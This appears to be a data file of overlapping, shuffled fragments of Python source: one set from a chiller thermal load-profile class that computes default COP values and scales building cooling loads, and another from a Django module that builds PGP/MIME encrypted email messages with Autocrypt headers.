"LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to be in units of",
"import datetime from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based",
"= pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\ for i, month",
"is a static method so it can be accessible in views.py self.chiller_cop =",
"is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude']",
"LoadProfile object resulting from parsed inputs :param latitude: (float) site latitude :param longitude:",
"combine_loadlist.append(list(partial_load_list)) # In the case where the user supplies a list of doe_reference_names",
"time_steps_per_hour: (int) simulation time resolution :param year: (int) electric LoadProfile year :param chiller_cop:",
"default annual loads for this location if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is",
"None): #load_list is always expected to be in units of kWt self.load_list =",
"[] for i in range(len(doe_reference_name)): # Monthly loads can only be used to",
"enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None: electric_load_list = [kwargs['annual_fraction'] * kw for kw",
"None kwargs['annual_energy'] = None # Annual loads are used in place of percent",
"* \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply a max_ton, max_kwt or max_kw value\")",
"chiller load if self.chiller_cop is None: if electric_load_list is not None: #This is",
"\"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is",
"first if kwargs.get('loads_ton') is not None: self.load_list = [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']]",
"or int) Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum",
"is not None) or (kwargs.get(\"monthly_tonhour\") is not None): #load_list is always expected to",
"max_ton elif max_kwt is not None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif max_kw",
"Reference building profile are used if there is a reference name provided elif",
"= np.concatenate([[x] * time_steps_per_hour \\ for x in self.built_in_profile]) else: partial_load_list = self.built_in_profile",
"kwargs.get('loads_fraction') is not None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not",
"as pd import numpy as np from datetime import datetime from reo.utilities import",
"not None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please",
"non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None",
"Use highest resultion/quality input first if kwargs.get('loads_ton') is not None: self.load_list = [i*TONHOUR_TO_KWHT",
"range(len(doe_reference_name)): # Monthly loads can only be used to scale a non-hybrid profile",
"= year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour > 1: partial_load_list = np.concatenate([[x] * time_steps_per_hour",
"be in units of kWth if electric_load_list is not None: self.load_list = [i*self.chiller_cop",
"for i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None: electric_load_list = [kwargs['annual_fraction']",
"for i in electric_load_list] self.annual_kwht = int(round(sum(self.load_list),0)) if dfm is not None: dfm.add_load_chiller_thermal(self)",
"i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None: electric_load_list = [kwargs['annual_fraction'] *",
"need to covert kWh to kWht electric_load_list = None # Use highest resultion/quality",
"None: total_site_load = sum([sum(l) for l in combine_loadlist]) for i, load in enumerate(combine_loadlist):",
"= latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] =",
"load will be the sum # of the default annual loads for this",
"from datetime import datetime from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load",
"np.concatenate([[x] * time_steps_per_hour \\ for x in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list))",
"the default annual loads for this location if (len(doe_reference_name) > 1) and kwargs['annual_energy']",
"[] combine_loadlist = [] for i in range(len(doe_reference_name)): # Monthly loads can only",
"= \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def",
"load (if not user-entered) self.chiller_cop = chiller_cop # Update COP based on estimated",
"BuiltInProfile import os import json import pandas as pd import numpy as np",
"# load_list is always expected to be in units of kWth if electric_load_list",
"\"\"\" :param dfm: (object) data_manager to which this load object will be added",
"1) and kwargs['annual_energy'] is None: total_site_load = sum([sum(l) for l in combine_loadlist]) for",
"kw for kw in total_electric_load_list] #Calculate COP based on kwth load or kw",
"loop above. This scalar makes it such that # when the percent shares",
"to be in units of kWth if electric_load_list is not None: self.load_list =",
"max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply a max_ton, max_kwt",
"views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method so",
"always expected to be in units of kWt self.load_list = [i*TONHOUR_TO_KWHT for i",
"4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is not",
"partial_load_list = np.concatenate([[x] * time_steps_per_hour \\ for x in self.built_in_profile]) else: partial_load_list =",
"share of annual load to each partial load if (len(doe_reference_name) > 1): for",
"simulation time resolution :param year: (int) electric LoadProfile year :param chiller_cop: (float or",
"#load_list is always expected to be in units of kWt self.load_list = [i*TONHOUR_TO_KWHT",
"applied that the total site load will be the sum # of the",
"chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm: (object) data_manager to which this load object",
"start of the loop above. This scalar makes it such that # when",
"there is a reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or []",
"longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm: (object) data_manager to",
"in reo/nested_inputs \"\"\" self.nearest_city = nearest_city self.latitude = latitude self.longitude = longitude self.time_steps_per_hour",
"100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None,",
"as defined in reo/nested_inputs \"\"\" self.nearest_city = nearest_city self.latitude = latitude self.longitude =",
"is always expected to be in units of kWt self.load_list = [i*TONHOUR_TO_KWHT for",
"load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load",
"kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude']",
"the percent share of annual load to each partial load if (len(doe_reference_name) >",
"= None # Use highest resultion/quality input first if kwargs.get('loads_ton') is not None:",
"self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list = hybrid_loadlist # If",
"total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not None) or",
"latitude :param longitude: (float) site longitude :param nearest_city: (str) site nearest_city :param time_steps_per_hour:",
"= max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply a max_ton,",
"raise Exception(\"Please supply a max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons *",
"be added :param total_electric_load_list: (array) electric LoadProfile object resulting from parsed inputs :param",
"super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour > 1: partial_load_list = np.concatenate([[x] * time_steps_per_hour \\ for",
"used if there is a reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name')",
"which was unknown at the start of the loop above. This scalar makes",
"\"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if",
"value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else:",
"a reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist =",
"self.load_list = [i*self.chiller_cop for i in electric_load_list] self.annual_kwht = int(round(sum(self.load_list),0)) if dfm is",
"[total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\ for i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not",
"electric_load_list is not None: self.load_list = [i*self.chiller_cop for i in electric_load_list] self.annual_kwht =",
"latitude: (float) site latitude :param longitude: (float) site longitude :param nearest_city: (str) site",
"self.chiller_cop is None: if electric_load_list is not None: #This is a static method",
"if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[],",
"static method so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list),",
"not None): #load_list is always expected to be in units of kWt self.load_list",
"on kwth load or kw load (if not user-entered) self.chiller_cop = chiller_cop #",
"np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list =",
"(object) data_manager to which this load object will be added :param total_electric_load_list: (array)",
"are used in place of percent shares if provided if kwargs.get(\"annual_tonhour\") is not",
"load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not None) or (kwargs.get(\"monthly_tonhour\") is",
"kw in total_electric_load_list] #Calculate COP based on kwth load or kw load (if",
"is always expected to be in units of kWth if electric_load_list is not",
"is not None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif max_kw is not None:",
"see if we need to covert kWh to kWht electric_load_list = None #",
"list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if",
"nearest_city self.latitude = latitude self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour self.year = year",
"in kwargs['loads_ton']] # DOE Reference building profile are used if there is a",
"> 1) and kwargs['annual_energy'] is None: total_site_load = sum([sum(l) for l in combine_loadlist])",
"kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] = longitude",
"it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This",
":param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on peak load for the",
"self.chiller_cop = chiller_cop # Update COP based on estimated max chiller load if",
"TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply a max_ton, max_kwt or max_kw",
"None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif max_kw is not None: max_cooling_load_tons =",
"kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist = [] for i in range(len(doe_reference_name)):",
"as if we had scaled the partial load to the total site #",
"numpy as np from datetime import datetime from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile):",
"percent shares # for consistency we want to act as if we had",
"= kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None # Annual loads",
"be used to scale a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy']",
"building profile are used if there is a reference name provided elif kwargs.get('doe_reference_name'):",
"kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None # Annual",
"kwargs['monthly_fraction'][month-1] \\ for i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None: electric_load_list",
"partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where the user supplies a",
"in units of kWt self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list",
"kwth load or kw load (if not user-entered) self.chiller_cop = chiller_cop # Update",
"user-entered) self.chiller_cop = chiller_cop # Update COP based on estimated max chiller load",
"consistency we want to act as if we had scaled the partial load",
"= longitude self.time_steps_per_hour = time_steps_per_hour self.year = year # Default electric_load_list to None,",
"and percent shares # for consistency we want to act as if we",
"(float or int) Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load: (float or int)",
"user supplies a list of doe_reference_names and percent shares # for consistency we",
"year # Default electric_load_list to None, used later to see if we need",
"l in combine_loadlist]) for i, load in enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load scalar =",
"not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] =",
":param total_electric_load_list: (array) electric LoadProfile object resulting from parsed inputs :param latitude: (float)",
"(array) electric LoadProfile object resulting from parsed inputs :param latitude: (float) site latitude",
"percent shares if provided if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads']",
"based on CRB defined load shapes or user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'),",
"not None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series",
"max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method so it can be accessible in",
"max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to be in units of kWth",
"* max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self,",
"[i*self.chiller_cop for i in electric_load_list] self.annual_kwht = int(round(sum(self.load_list),0)) if dfm is not None:",
"self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour self.year = year # Default electric_load_list to",
"of kWth if electric_load_list is not None: self.load_list = [i*self.chiller_cop for i in",
"static method so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list),",
"total_site_load = sum([sum(l) for l in combine_loadlist]) for i, load in enumerate(combine_loadlist): actual_percent_of_site_load",
"will be added :param total_electric_load_list: (array) electric LoadProfile object resulting from parsed inputs",
"not None: max_cooling_load_tons = max_ton elif max_kwt is not None: max_cooling_load_tons = max_kwt",
"(kwargs.get(\"annual_tonhour\") is not None) or (kwargs.get(\"monthly_tonhour\") is not None): #load_list is always expected",
"time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm: (object) data_manager to which this",
"a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] =",
"class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based on CRB defined load shapes or",
"kwargs['latitude'] = latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour']",
"Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor",
"1: partial_load_list = np.concatenate([[x] * time_steps_per_hour \\ for x in self.built_in_profile]) else: partial_load_list",
"act as if we had scaled the partial load to the total site"
] |
[
"already handled if name.lower() in ('from', 'to'): continue msg[name] = value return msg",
"= self.subject msg['From'] = self.extra_headers.get('From', self.from_email) msg['To'] = self.extra_headers.get('To', ', '.join(map(force_text, self.to))) if",
"self.to))) if self.cc: msg['Cc'] = ', '.join(map(force_text, self.cc)) if self.reply_to: msg['Reply-To'] = self.extra_headers.get(",
"email classes for MIME multipart/pgp-encrypted type messages. \"\"\" __all__ = ['EmailMessageEnc', 'EmailMessagePGP'] from",
"msg class EmailMessagePGP(EmailMessage): \"\"\"A container for encrypted email information.\"\"\" content_subtype = 'encrypted' mixed_subtype",
"= self.encoding or settings.DEFAULT_CHARSET msg = MIMEMultipartPGP(self.body) # FIXME: attachments # msg =",
"self.extra_headers.get( 'Reply-To', ', '.join(map(force_text, self.reply_to))) # Email header names are case-insensitive (RFC 2045),",
"'Reply-To', ', '.join(map(force_text, self.reply_to))) # Email header names are case-insensitive (RFC 2045), so",
"setting which # will get picked up by formatdate(). msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME) if",
"name, value in self.extra_headers.items(): # From and To are already handled if name.lower()",
"names are case-insensitive (RFC 2045), so we have to # accommodate that when",
"a timezone, however, Django sets the # TZ environment variable based on the",
"msg): self.msg = msg class EmailMessagePGP(EmailMessage): \"\"\"A container for encrypted email information.\"\"\" content_subtype",
"name.lower() in ('from', 'to'): continue msg[name] = value return msg def EmailMessagePGPAC(EmailMessagePGP): def",
"class EmailMessagePGP(EmailMessage): \"\"\"A container for encrypted email information.\"\"\" content_subtype = 'encrypted' mixed_subtype =",
"from django.core.mail.message import ( EmailMessage, MIMEMixin, forbid_multi_line_headers, force_text, make_msgid, formatdate, DNS_NAME) from emailpgp.mime.multipartpgp",
"mixed_subtype = '' def message(self): encoding = self.encoding or settings.DEFAULT_CHARSET msg = MIMEMultipartPGP(self.body)",
"'' def message(self): encoding = self.encoding or settings.DEFAULT_CHARSET msg = MIMEMultipartPGP(self.body) # FIXME:",
"# FIXME: attachments # msg = self._create_message(msg) msg['Subject'] = self.subject msg['From'] = self.extra_headers.get('From',",
"to, bcc, connection, attachments, headers, cc, reply_to) self.extra_headers = self.extra_headers.update( gen_ac_header_dict(to, keydata, pe))",
"forbid_multi_line_headers(name, val, self.encoding) MIMEMultipartPGP.__setitem__(self, name, val) class EmailMessageEnc(EmailMessage): def message(self, msg): self.msg =",
"'.join(map(force_text, self.to))) if self.cc: msg['Cc'] = ', '.join(map(force_text, self.cc)) if self.reply_to: msg['Reply-To'] =",
"up by formatdate(). msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME) if 'message-id' not in header_names: # Use",
"autocrypt.pgpymessage import gen_ac_header_dict class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP): def __init__(self, _data=None, _subtype='encrypted', boundary=None, encoding=None, **_params):",
"settings from django.core.mail.message import ( EmailMessage, MIMEMixin, forbid_multi_line_headers, force_text, make_msgid, formatdate, DNS_NAME) from",
"def __init__(self, _data=None, _subtype='encrypted', boundary=None, encoding=None, **_params): self.encoding = encoding MIMEMultipartPGP.__init__(self, _data, boundary,",
"# TZ environment variable based on the TIME_ZONE setting which # will get",
"riseup dot net), under MIT license. \"\"\"Extend Django email classes for MIME multipart/pgp-encrypted",
"the # TZ environment variable based on the TIME_ZONE setting which # will",
"formatdate(localtime=settings.EMAIL_USE_LOCALTIME) if 'message-id' not in header_names: # Use cached DNS_NAME for performance msg['Message-ID']",
"msg['From'] = self.extra_headers.get('From', self.from_email) msg['To'] = self.extra_headers.get('To', ', '.join(map(force_text, self.to))) if self.cc: msg['Cc']",
"from_email, to, bcc, connection, attachments, headers, cc, reply_to) self.extra_headers = self.extra_headers.update( gen_ac_header_dict(to, keydata,",
"juga (juga at riseup dot net), under MIT license. \"\"\"Extend Django email classes",
"self.extra_headers.get('From', self.from_email) msg['To'] = self.extra_headers.get('To', ', '.join(map(force_text, self.to))) if self.cc: msg['Cc'] = ',",
"', '.join(map(force_text, self.reply_to))) # Email header names are case-insensitive (RFC 2045), so we",
"when doing comparisons. header_names = [key.lower() for key in self.extra_headers] if 'date' not",
"however, Django sets the # TZ environment variable based on the TIME_ZONE setting",
"= self.extra_headers.get('To', ', '.join(map(force_text, self.to))) if self.cc: msg['Cc'] = ', '.join(map(force_text, self.cc)) if",
"we have to # accommodate that when doing comparisons. header_names = [key.lower() for",
"concept of a timezone, however, Django sets the # TZ environment variable based",
"-*- # vim:ts=4:sw=4:expandtab # Copyright 2017 juga (juga at riseup dot net), under",
"# Copyright 2017 juga (juga at riseup dot net), under MIT license. \"\"\"Extend",
"coding: utf-8 -*- # vim:ts=4:sw=4:expandtab # Copyright 2017 juga (juga at riseup dot",
"for encrypted email information.\"\"\" content_subtype = 'encrypted' mixed_subtype = '' def message(self): encoding",
"get picked up by formatdate(). msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME) if 'message-id' not in header_names:",
"handled if name.lower() in ('from', 'to'): continue msg[name] = value return msg def",
"or settings.DEFAULT_CHARSET msg = MIMEMultipartPGP(self.body) # FIXME: attachments # msg = self._create_message(msg) msg['Subject']",
"'message-id' not in header_names: # Use cached DNS_NAME for performance msg['Message-ID'] = make_msgid(domain=DNS_NAME)",
"self.extra_headers] if 'date' not in header_names: # formatdate() uses stdlib methods to format",
"self.cc: msg['Cc'] = ', '.join(map(force_text, self.cc)) if self.reply_to: msg['Reply-To'] = self.extra_headers.get( 'Reply-To', ',",
"name, val) class EmailMessageEnc(EmailMessage): def message(self, msg): self.msg = msg class EmailMessagePGP(EmailMessage): \"\"\"A",
"variable based on the TIME_ZONE setting which # will get picked up by",
"continue msg[name] = value return msg def EmailMessagePGPAC(EmailMessagePGP): def __init__(self, subject='', body='', from_email=None,",
"EmailMessage, MIMEMixin, forbid_multi_line_headers, force_text, make_msgid, formatdate, DNS_NAME) from emailpgp.mime.multipartpgp import MIMEMultipartPGP from autocrypt.pgpymessage",
"= MIMEMultipartPGP(self.body) # FIXME: attachments # msg = self._create_message(msg) msg['Subject'] = self.subject msg['From']",
"dot net), under MIT license. \"\"\"Extend Django email classes for MIME multipart/pgp-encrypted type",
"msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME) if 'message-id' not in header_names: # Use cached DNS_NAME for",
"for key in self.extra_headers] if 'date' not in header_names: # formatdate() uses stdlib",
"# Use cached DNS_NAME for performance msg['Message-ID'] = make_msgid(domain=DNS_NAME) for name, value in",
"= value return msg def EmailMessagePGPAC(EmailMessagePGP): def __init__(self, subject='', body='', from_email=None, to=None, bcc=None,",
"keydata=None, pe=None): super(EmailMessagePGPAC, self).__init__( subject, body, from_email, to, bcc, connection, attachments, headers, cc,",
"val) class EmailMessageEnc(EmailMessage): def message(self, msg): self.msg = msg class EmailMessagePGP(EmailMessage): \"\"\"A container",
"boundary=None, encoding=None, **_params): self.encoding = encoding MIMEMultipartPGP.__init__(self, _data, boundary, **_params) def __setitem__(self, name,",
"header names are case-insensitive (RFC 2045), so we have to # accommodate that",
"which use # the stdlib/OS concept of a timezone, however, Django sets the",
"if 'message-id' not in header_names: # Use cached DNS_NAME for performance msg['Message-ID'] =",
"name, val = forbid_multi_line_headers(name, val, self.encoding) MIMEMultipartPGP.__setitem__(self, name, val) class EmailMessageEnc(EmailMessage): def message(self,",
"self.subject msg['From'] = self.extra_headers.get('From', self.from_email) msg['To'] = self.extra_headers.get('To', ', '.join(map(force_text, self.to))) if self.cc:",
"cached DNS_NAME for performance msg['Message-ID'] = make_msgid(domain=DNS_NAME) for name, value in self.extra_headers.items(): #",
"encrypted email information.\"\"\" content_subtype = 'encrypted' mixed_subtype = '' def message(self): encoding =",
"email information.\"\"\" content_subtype = 'encrypted' mixed_subtype = '' def message(self): encoding = self.encoding",
"accommodate that when doing comparisons. header_names = [key.lower() for key in self.extra_headers] if",
"['EmailMessageEnc', 'EmailMessagePGP'] from django.conf import settings from django.core.mail.message import ( EmailMessage, MIMEMixin, forbid_multi_line_headers,",
"are already handled if name.lower() in ('from', 'to'): continue msg[name] = value return",
"= 'encrypted' mixed_subtype = '' def message(self): encoding = self.encoding or settings.DEFAULT_CHARSET msg",
"self.msg = msg class EmailMessagePGP(EmailMessage): \"\"\"A container for encrypted email information.\"\"\" content_subtype =",
"'.join(map(force_text, self.reply_to))) # Email header names are case-insensitive (RFC 2045), so we have",
"import MIMEMultipartPGP from autocrypt.pgpymessage import gen_ac_header_dict class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP): def __init__(self, _data=None, _subtype='encrypted',",
"in ('from', 'to'): continue msg[name] = value return msg def EmailMessagePGPAC(EmailMessagePGP): def __init__(self,",
"classes for MIME multipart/pgp-encrypted type messages. \"\"\" __all__ = ['EmailMessageEnc', 'EmailMessagePGP'] from django.conf",
"comparisons. header_names = [key.lower() for key in self.extra_headers] if 'date' not in header_names:",
"from emailpgp.mime.multipartpgp import MIMEMultipartPGP from autocrypt.pgpymessage import gen_ac_header_dict class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP): def __init__(self,",
"on the TIME_ZONE setting which # will get picked up by formatdate(). msg['Date']",
"attachments # msg = self._create_message(msg) msg['Subject'] = self.subject msg['From'] = self.extra_headers.get('From', self.from_email) msg['To']",
"body, from_email, to, bcc, connection, attachments, headers, cc, reply_to) self.extra_headers = self.extra_headers.update( gen_ac_header_dict(to,",
"MIMEMixin, forbid_multi_line_headers, force_text, make_msgid, formatdate, DNS_NAME) from emailpgp.mime.multipartpgp import MIMEMultipartPGP from autocrypt.pgpymessage import",
"FIXME: attachments # msg = self._create_message(msg) msg['Subject'] = self.subject msg['From'] = self.extra_headers.get('From', self.from_email)",
"in self.extra_headers] if 'date' not in header_names: # formatdate() uses stdlib methods to",
"name, val): name, val = forbid_multi_line_headers(name, val, self.encoding) MIMEMultipartPGP.__setitem__(self, name, val) class EmailMessageEnc(EmailMessage):",
"Email header names are case-insensitive (RFC 2045), so we have to # accommodate",
"that when doing comparisons. header_names = [key.lower() for key in self.extra_headers] if 'date'",
"if name.lower() in ('from', 'to'): continue msg[name] = value return msg def EmailMessagePGPAC(EmailMessagePGP):",
"class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP): def __init__(self, _data=None, _subtype='encrypted', boundary=None, encoding=None, **_params): self.encoding = encoding",
"MIT license. \"\"\"Extend Django email classes for MIME multipart/pgp-encrypted type messages. \"\"\" __all__",
"connection=None, attachments=None, headers=None, cc=None, reply_to=None, keydata=None, pe=None): super(EmailMessagePGPAC, self).__init__( subject, body, from_email, to,",
"= forbid_multi_line_headers(name, val, self.encoding) MIMEMultipartPGP.__setitem__(self, name, val) class EmailMessageEnc(EmailMessage): def message(self, msg): self.msg",
"header_names: # Use cached DNS_NAME for performance msg['Message-ID'] = make_msgid(domain=DNS_NAME) for name, value",
"at riseup dot net), under MIT license. \"\"\"Extend Django email classes for MIME",
"= '' def message(self): encoding = self.encoding or settings.DEFAULT_CHARSET msg = MIMEMultipartPGP(self.body) #",
"of a timezone, however, Django sets the # TZ environment variable based on",
"multipart/pgp-encrypted type messages. \"\"\" __all__ = ['EmailMessageEnc', 'EmailMessagePGP'] from django.conf import settings from",
"self.encoding or settings.DEFAULT_CHARSET msg = MIMEMultipartPGP(self.body) # FIXME: attachments # msg = self._create_message(msg)",
"the stdlib/OS concept of a timezone, however, Django sets the # TZ environment",
"def __setitem__(self, name, val): name, val = forbid_multi_line_headers(name, val, self.encoding) MIMEMultipartPGP.__setitem__(self, name, val)",
"# will get picked up by formatdate(). msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME) if 'message-id' not",
"def EmailMessagePGPAC(EmailMessagePGP): def __init__(self, subject='', body='', from_email=None, to=None, bcc=None, connection=None, attachments=None, headers=None, cc=None,",
"subject='', body='', from_email=None, to=None, bcc=None, connection=None, attachments=None, headers=None, cc=None, reply_to=None, keydata=None, pe=None): super(EmailMessagePGPAC,",
"from django.conf import settings from django.core.mail.message import ( EmailMessage, MIMEMixin, forbid_multi_line_headers, force_text, make_msgid,",
"import settings from django.core.mail.message import ( EmailMessage, MIMEMixin, forbid_multi_line_headers, force_text, make_msgid, formatdate, DNS_NAME)",
"MIMEMultipartPGP.__setitem__(self, name, val) class EmailMessageEnc(EmailMessage): def message(self, msg): self.msg = msg class EmailMessagePGP(EmailMessage):",
"_subtype='encrypted', boundary=None, encoding=None, **_params): self.encoding = encoding MIMEMultipartPGP.__init__(self, _data, boundary, **_params) def __setitem__(self,",
"'encrypted' mixed_subtype = '' def message(self): encoding = self.encoding or settings.DEFAULT_CHARSET msg =",
